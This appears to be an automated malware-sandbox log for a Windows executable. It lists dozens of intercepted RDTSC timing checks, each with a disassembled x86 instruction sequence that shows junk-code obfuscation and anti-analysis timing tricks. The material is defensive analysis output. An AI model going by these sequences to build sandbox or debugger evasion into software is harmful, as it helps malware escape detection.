Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A506A second address: 3A508B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4688C929E7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A508B second address: 3A5095 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5095 second address: 3A509D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A509D second address: 3A50A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3769FA second address: 35737C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F4688C929D8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov ecx, esi 0x00000023 lea eax, dword ptr [ebp+1247B77Fh] 0x00000029 mov dword ptr [ebp+122D2384h], ecx 0x0000002f mov dx, 068Ch 0x00000033 push eax 0x00000034 push esi 0x00000035 ja 00007F4688C929DCh 0x0000003b pop esi 0x0000003c mov dword ptr [esp], eax 0x0000003f and di, 3862h 0x00000044 xor dword ptr [ebp+1243E974h], ebx 0x0000004a call dword ptr [ebp+122D1A32h] 0x00000050 push eax 0x00000051 push edx 0x00000052 jno 00007F4688C929D8h 0x00000058 jmp 00007F4688C929E4h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376E75 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4688C1B76Ah 0x00000011 push edi 0x00000012 jng 00007F4688C1B766h 0x00000018 pop edi 0x00000019 popad 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D32E3h] 0x00000021 push dword ptr [ebp+122D02D1h] 0x00000027 mov dword ptr [ebp+122D324Dh], edx 0x0000002d call dword ptr [ebp+122D34DBh] 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D1AD8h], ecx 0x0000003a xor eax, eax 0x0000003c cld 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F4688C1B779h 0x00000046 mov dword ptr [ebp+122D3B28h], eax 0x0000004c add dword ptr [ebp+122D1AD8h], ebx 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1AD8h], esi 0x0000005d mov dword ptr [ebp+122D1AD8h], esi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 clc 0x00000068 lodsw 0x0000006a clc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f or dword ptr [ebp+122D1AD8h], ebx 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jmp 00007F4688C1B76Ch 0x0000007e nop 0x0000007f pushad 0x00000080 push edx 0x00000081 jmp 00007F4688C1B76Ah 0x00000086 pop edx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F4688C1B778h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FAE second address: 376FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FB4 second address: 376FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FB8 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c mov cx, di 0x0000000f pop edx 0x00000010 xor dword ptr [ebp+122D33DCh], edi 0x00000016 push dword ptr [ebp+122D02D1h] 0x0000001c xor cx, 1B3Dh 0x00000021 call dword ptr [ebp+122D34DBh] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F4688C929E9h 0x0000003a mov dword ptr [ebp+122D3B28h], eax 0x00000040 add dword ptr [ebp+122D1AD8h], ebx 0x00000046 mov esi, 0000003Ch 0x0000004b mov dword ptr [ebp+122D1AD8h], esi 0x00000051 mov dword ptr [ebp+122D1AD8h], esi 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b clc 0x0000005c lodsw 0x0000005e clc 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 or dword ptr [ebp+122D1AD8h], ebx 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d jmp 00007F4688C929DCh 0x00000072 nop 0x00000073 pushad 0x00000074 push edx 0x00000075 jmp 00007F4688C929DAh 0x0000007a pop edx 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F4688C929E8h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377314 second address: 37731A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377D08 second address: 377D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377D0C second address: 377D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377DA8 second address: 377DF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F4688C929E5h 0x00000010 lea eax, dword ptr [ebp+1247B77Fh] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+124444CEh], esi 0x0000001d mov dword ptr [ebp+124453C9h], esi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4688C929E5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41E7 second address: 3A41EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41EB second address: 3A41F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41F1 second address: 3A41FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4476 second address: 3A4480 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4480 second address: 3A448E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4688C1B76Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A448E second address: 3A44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4688C929E6h 0x0000000a ja 00007F4688C929D6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4688C929DDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A44C6 second address: 3A44DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F4688C1B76Eh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A44DE second address: 3A44FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007F4688C929DFh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A48C9 second address: 3A48CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A48CF second address: 3A48D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4A22 second address: 3A4A34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F4688C1B76Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4BFF second address: 3A4C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ADA31 second address: 3ADA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F4688C1B766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 336065 second address: 336077 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4688C929D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 336077 second address: 336087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F4688C1B77Ah 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC336 second address: 3AC33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC33A second address: 3AC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C1B770h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC350 second address: 3AC355 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC355 second address: 3AC38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F4688C1B774h 0x0000000d jmp 00007F4688C1B779h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC38C second address: 3AC3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4688C929D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jg 00007F4688C929D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F4688C929D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC3AA second address: 3AC3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC514 second address: 3AC519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC6C3 second address: 3AC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ACE49 second address: 3ACE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ACE4D second address: 3ACE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD171 second address: 3AD176 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD8DB second address: 3AD900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4688C1B766h 0x00000009 jmp 00007F4688C1B778h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD900 second address: 3AD906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC094 second address: 3AC099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2E1D second address: 3B2E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2E27 second address: 3B2E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2F62 second address: 3B2F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3399 second address: 3B339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B339E second address: 3B33D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4688C929E4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jp 00007F4688C929D6h 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B33D8 second address: 3B33ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C1B76Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B33ED second address: 3B342B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pushad 0x00000008 jno 00007F4688C929D6h 0x0000000e jmp 00007F4688C929E5h 0x00000013 jmp 00007F4688C929DBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3587 second address: 3B35C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 jnc 00007F4688C1B76Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F4688C1B768h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4688C1B76Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B35C0 second address: 3B35C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B35C8 second address: 3B35D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B385B second address: 3B385F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B385F second address: 3B3863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3863 second address: 3B3897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C929E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B39D2 second address: 3B39D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B89 second address: 3B3B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B8F second address: 3B3B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4688C1B77Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B9C second address: 3B3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BB1 second address: 3B3BB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BB6 second address: 3B3BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DFh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4688C929D6h 0x00000015 jmp 00007F4688C929E5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BEA second address: 3B3C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4688C1B766h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3EB4 second address: 3B3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3EBB second address: 3B3EC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8B1 second address: 3BA8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8B7 second address: 3BA8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8D4 second address: 3BA8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4688C929DEh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8E9 second address: 3BA901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA901 second address: 3BA910 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA910 second address: 3BA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA917 second address: 3BA931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E0h 0x00000009 jns 00007F4688C929D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA931 second address: 3BA935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA935 second address: 3BA93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BAA8E second address: 3BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BD20F second address: 3BD213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BD213 second address: 3BD219 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2935 second address: 3C293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2D29 second address: 3C2D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2D2D second address: 3C2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 ja 00007F4688C929D6h 0x0000000f pop ebx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4688C929D6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377816 second address: 37781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37781C second address: 377845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4688C929DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377845 second address: 37784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C32BC second address: 3C32F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4688C929D6h 0x00000008 jng 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jmp 00007F4688C929E6h 0x0000001d popad 0x0000001e jng 00007F4688C929F0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
